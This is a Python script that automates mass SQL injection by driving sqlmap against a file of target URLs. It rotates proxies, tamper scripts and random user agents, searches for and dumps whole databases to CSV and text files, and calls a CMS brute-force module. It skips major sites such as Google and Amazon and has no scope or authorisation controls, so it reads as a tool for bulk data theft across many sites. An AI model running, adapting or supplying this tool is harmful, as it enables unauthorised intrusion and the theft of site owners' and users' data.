#!/usr/bin/env python
#coding: utf-8
from multiprocessing.dummy import Pool
from subprocess import Popen, PIPE, call, check_call
import os
import re
import sys
import glob
import time
import shutil
import logging
import urlparse
import requests
#import Exploits
import traceback
import threading
import builtwith
from random import choice
#from urlparse import urlparse
from datetime import datetime
from psutil import Process, TimeoutExpired
from requests import get
from brutecms import brutecont
from requests.exceptions import ReadTimeout, ConnectTimeout
import wrapper_config
try:
dump = sys.argv[1]
except:
dump = wrapper_config.COLUMN_DUMP
if (wrapper_config.Check_SQLi == True and wrapper_config.DUMP == True and wrapper_config.DUMP_ALL == True and wrapper_config.BRUTE_CMS == False and wrapper_config.EXPLOITS_CMS == False):
print('Check_SQLi or DUMP or DUMP_ALL or BRUTE_CMS or EXPLOITS_CMS')
sys.exit()
elif (wrapper_config.Check_SQLi == False and wrapper_config.DUMP == False and wrapper_config.DUMP_ALL == False and wrapper_config.BRUTE_CMS == False and wrapper_config.EXPLOITS_CMS == False):
print('Check_SQLi or DUMP or DUMP_ALL or BRUTE_CMS or EXPLOITS_CMS')
sys.exit()
DUMP_SQLMAP_FOLDER = os.path.join(
os.path.dirname(
os.path.realpath(__file__)),
wrapper_config.DUMP_FOLDER)
DUMP_SQLMAP_SAVE = os.path.join(
os.path.dirname(
os.path.realpath(__file__)),
wrapper_config.SQLMAP_DUMPS)
print DUMP_SQLMAP_SAVE
DUMP_TXT_FOLDER = os.path.join(
os.path.dirname(
os.path.realpath(__file__)),
wrapper_config.WRAPPER_TXT_DUMPS)
print DUMP_TXT_FOLDER
STEPS = [10,100, 300, 500, 1000, 1500, 2000, 3000, 5000, 10000, 20000, 50000, 100000]
#STEPS = [100]
def checkcms(url):
try:
cms = builtwith.builtwith(url)
w = url + " | CMS: " + cms["cms"][0]
except:
w = checkencoom(url)
return w
def checkencoom(url):
try:
cms = builtwith.builtwith(url)
w = url + " | CMS: " + cms["ecommerce"][0]
except:
w = "CMS: Not found"
return w
def sqlmap_check(url, pos, check_timeout, proxy=None):
print('set %s' % url)
print('left %s url(s)' % pos)
if proxy:
print('set proxy %s://%s' % (wrapper_config.PROXY_TYPE, proxy))
start_time = datetime.now().time()
if wrapper_config.PROXY and wrapper_config.PROXY_USERNAME and wrapper_config.PROXY_PASSWORD:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--count',
'--tamper=%s' % wrapper_config.TAMPER,
'--dump-format=CSV',
'--answers=quit=n,crack=n',
'--search',
'-C %s' % dump,
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
'--proxy=%s://%s' % (
wrapper_config.PROXY_TYPE,
proxy),
'--proxy-cred=%s:%s' % (
wrapper_config.PROXY_USERNAME,
wrapper_config.PROXY_PASSWORD),
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
elif wrapper_config.PROXY:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--count',
'--tamper=%s' % wrapper_config.TAMPER,
'--dump-format=CSV',
'--answers=quit=n,crack=n',
'--search',
'-C %s' % dump,
#'--answers="quit=n, crack=n"'
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
#'--proxy=socks5://localhost:9091',
'--proxy=%s://%s' % (
wrapper_config.PROXY_TYPE,
proxy),
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
else:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--time-sec=30',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--count',
'--tamper=%s' % wrapper_config.TAMPER,
'--search',
'-C %s' % dump,
'--dump-format=CSV',
'--answers=quit=n,crack=n',
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
#'--proxy=socks5://localhost:9091',
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
end_time = datetime.now().time()
if domains_dublicate(url):
print('detect domains dublicate %s pass it' % url)
return False
dbs_data = log_num_parser(url)
#print dbs_data
#sys.exit()
if dbs_data:
async_tables_pool = Pool()
for db, tables in dbs_data.items():
for table, num in tables.items():
for step in STEPS: #STEPS = [10,100, 300, 500, 1000, 1500, 2000, 3000, 5000, 10000, 20000, 50000, 100000]
if int(num) > step:
try:
async_tables_pool.apply_async(
sqlmap_dump(
url,
56000,
proxy))
except:pass
else:
break
async_tables_pool.close()
async_tables_pool.join()
def sqlmap_dump(url, check_timeout, proxy=None):
start_time = datetime.now().time()
if wrapper_config.PROXY and wrapper_config.PROXY_USERNAME and wrapper_config.PROXY_PASSWORD:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--time-sec=30',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--search',
'-C %s' % dump,
'--dump-format=CSV',
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
'--proxy=%s://%s' % (
wrapper_config.PROXY_TYPE,
proxy),
'--proxy-cred=%s:%s' % (
wrapper_config.PROXY_USERNAME,
wrapper_config.PROXY_PASSWORD),
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
elif wrapper_config.PROXY:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--search',
'-C %s' % dump,
'--dump-format=CSV',
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
'--proxy=%s://%s' % (
wrapper_config.PROXY_TYPE,
proxy),
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
else:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--time-sec=15',
'--batch',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--search',
'-C %s' % dump,
'--dump-format=CSV',
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
#'--proxy=socks5://localhost:9091',
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
def sqlmap_dump_all(url, pos, check_timeout, proxy=None):
print "Dump All"
print('set %s' % url)
print('left %s url(s)' % pos)
start_time = datetime.now().time()
if wrapper_config.PROXY and wrapper_config.PROXY_USERNAME and wrapper_config.PROXY_PASSWORD:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--time-sec=30',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--dump-all',
'--dump-format=CSV',
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
'--proxy=%s://%s' % (
wrapper_config.PROXY_TYPE,
proxy),
'--proxy-cred=%s:%s' % (
wrapper_config.PROXY_USERNAME,
wrapper_config.PROXY_PASSWORD),
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
elif wrapper_config.PROXY:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--dump-all',
'--dump-format=CSV',
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
'--proxy=%s://%s' % (
wrapper_config.PROXY_TYPE,
proxy),
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
else:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--time-sec=15',
'--batch',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--dump-all',
'--dump-format=CSV',
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
#'--proxy=socks5://localhost:9091',
'--exclude-sysdbs',
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired:pass
try:
psu_process.kill()
except:pass
def sqli_check(url, pos, check_timeout, proxy=None):
print "Find SQLi"
print('set %s' % url)
print('left %s url(s)' % pos)
if proxy:
print('set proxy %s://%s' % (wrapper_config.PROXY_TYPE, proxy))
start_time = datetime.now().time()
if wrapper_config.PROXY and wrapper_config.PROXY_USERNAME and wrapper_config.PROXY_PASSWORD:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--time-sec=30',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
'--proxy=%s://%s' % (
wrapper_config.PROXY_TYPE,
proxy),
'--proxy-cred=%s:%s' % (
wrapper_config.PROXY_USERNAME,
wrapper_config.PROXY_PASSWORD),
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
elif wrapper_config.PROXY:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--batch',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
'--proxy=%s://%s' % (
wrapper_config.PROXY_TYPE,
proxy),
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
else:
process = Popen(
[
'python',
'sqlmap.py',
'--url=%s' % url,
'--time-sec=15',
'--batch',
'--level=%s' % wrapper_config.LEVEL,
'--risk=%s' % wrapper_config.RISK,
'--random-agent',
'--threads=3',
'--answers=quit=n,crack=n',
'--tamper=%s' % wrapper_config.TAMPER,
'--output-dir=%s' % DUMP_SQLMAP_SAVE,
'--timeout=%s' % wrapper_config.TIMEOUT,
'--retries=%s' % wrapper_config.RETRIES,
'--technique=EUSQ',
])
psu_process = Process(process.pid)
try:
psu_process.wait(check_timeout)
except TimeoutExpired: pass
try:
psu_process.kill()
except: pass
def domains_dublicate(url):
try:
domains = urlparse(url).netloc
if ':' in domains:
domains = domains.split(':')[0]
if domains in dublicates:
return True
else:
dublicates.append(domains)
open('dublicat.txt', 'a+').write(domains + '\n')
return False
except:
return False
def clean_url(url):
return url.split("'")[0]
def get_proxies(url):
try:
return get(url, timeout=120).text.splitlines()
except (ConnectTimeout, ReadTimeout):
print('cant grab proxies %s ; check link' % url)
sys.exit()
def find_dump():
for file in glob.glob(DUMP_SQLMAP_SAVE+"/**"):
for dirpath, dirnames, files in os.walk(file):
for filelog in files:
if filelog == 'log':
if os.path.getsize(dirpath + '/' + filelog) > 0:
url = dirpath.split('/')[4]
open(wrapper_config.SQLi_SAVE_FILE, 'a+').write(str(url) + '\n')
log_file = open(dirpath + '/' + filelog)
open('log', 'a+').write(dirpath + '\n')
for line in log_file:
open('log', 'a+').write(line + '\n')
del_dub(wrapper_config.SQLi_SAVE_FILE)
else:
if wrapper_config.DELETE == True:
shutil.rmtree(file)
def save_txt():
for root, dirs, files in os.walk(DUMP_SQLMAP_SAVE):
for file in files:
print file
if file.endswith(".csv"):
path_file = os.path.join(root,file)
res = file.replace('.csv', '.txt')
shutil.copy(path_file, DUMP_TXT_FOLDER + '/' + res)
def del_dub(file):
text_file = open(file)
lines = text_file.read().split('\n')
lines = list(set(lines))
lines = list(filter(None, lines))
open(file, 'w').close()
for line in lines:
open(file, 'a+').write(line+'\n')
def sites_dev():
if wrapper_config.Check_List == True:
print('Check list target')
output = []
urls = open(wrapper_config.URLS_FILE).read().splitlines()
for url in urls:
check = re.compile(r'^(?:http)s?://', re.IGNORECASE)
checks = re.match(check, url) is not None
if len(url) > 0:
if checks != True:
open(wrapper_config.URLS_FILE, 'a+').write('http://' + url + '\n')
del_dub(wrapper_config.URLS_FILE)
urls = open(wrapper_config.URLS_FILE).read().splitlines()
for url in urls:
if not "facebook" in url and not "ebay" in url and not "youtube" in url and not "google" in url and not "cxsecurity" in url and not "pastebin" in url and not "amazon" in url and not "microsoft" in url and not "yahoo" in url and "http" in url and len(url) > 0:
output.append(url + '\n')
if output:
f = open(wrapper_config.URLS_FILE, 'w')
f.writelines(output)
f.close()
del_dub(wrapper_config.URLS_FILE)
if os.stat(wrapper_config.URLS_FILE).st_size == 0:
print 'No target'
sys.exit()
def get_dump_size(url):
domains = urlparse(url).netloc
if ':' in domains:
domains = domains.split(':')[0]
domains_dump_folder = os.path.join(
DUMP_SQLMAP_FOLDER,
domains,
'dump')
total_size = 0
for dirpath, dirnames, filenames in os.walk(domains_dump_folder):
for f in filenames:
fp = os.path.join(dirpath, f)
total_size += os.path.getsize(fp)
return total_size/1024
dublicates = None
def threads():
global dublicates
dublicates = []
new = False
try:
logfile = open(wrapper_config.LOG_FILE).read().splitlines()
except: new = True
else:
if len(logfile) > 2:
for line in logfile:
if 'all work done' in line:
new = True
else:
new = True
if new:
if wrapper_config.DEBUG:
logging.basicConfig(
level=logging.DEBUG,
filename=wrapper_config.LOG_FILE,
filemode='w')
print('starting new session')
try:
urls = open(wrapper_config.URLS_FILE).read().splitlines()
except IOError:
print('cant open %s check file' % wrapper_config.URLS_FILE)
sys.exit()
else:
if wrapper_config.DEBUG:
logging.basicConfig(
level=logging.DEBUG,
filename=wrapper_config.LOG_FILE,
filemode='a')
print('detect previous session, restore')
try:
urls = open(wrapper_config.URLS_FILE).read().splitlines()
#print urls
except IOError:
print('cant open %s check file' % wrapper_config.URLS_FILE)
sys.exit()
for line in reversed(logfile):
if ':set' in line:
try:
lasturl = line.split(':set ')[1]
lasturl_index = urls.index(lasturl) + 1
except: print('cant detect last url %s in task' % lasturl)
else:
print('detect last url in task %s' % lasturl)
break
proxies = []
if wrapper_config.PROXY:
if wrapper_config.PROXY_FILE:
proxies = open(wrapper_config.PROXY_FILE).read().splitlines()
print('get proxies from %s' % wrapper_config.PROXY_FILE)
for lim in range(0, len(urls), wrapper_config.URLS_LIMIT):
urls_chunk = urls[lim:lim + wrapper_config.URLS_LIMIT]
pool = Pool(wrapper_config.THREADS)
for index, url in enumerate(urls_chunk):
try:
position = len(urls) - urls.index(url)
except:
position = 0
if wrapper_config.Check_SQLi == True:
if wrapper_config.PROXY:
pool.apply_async(sqli_check, (
clean_url(url),
position, 56000, choice(proxies)))
else:
pool.apply_async(sqli_check, (
clean_url(url),
position, 56000))
if wrapper_config.DUMP == True:
if wrapper_config.PROXY:
pool.apply_async(sqlmap_check, (
clean_url(url),
position, 56000, choice(proxies)))
else:
pool.apply_async(sqlmap_check,
(clean_url(url), position, 56000))
if wrapper_config.DUMP_ALL == True:
if wrapper_config.PROXY:
pool.apply_async(sqlmap_dump_all, (
clean_url(url),
position, 56000, choice(proxies)))
else:
pool.apply_async(sqlmap_dump_all,
(clean_url(url), position, 56000))
pool.close()
pool.join()
find_dump()
save_txt()
brutecont()
#exploit()
try:
sites_dev()
threads()
except KeyboardInterrupt:
save_txt()
sys.exit()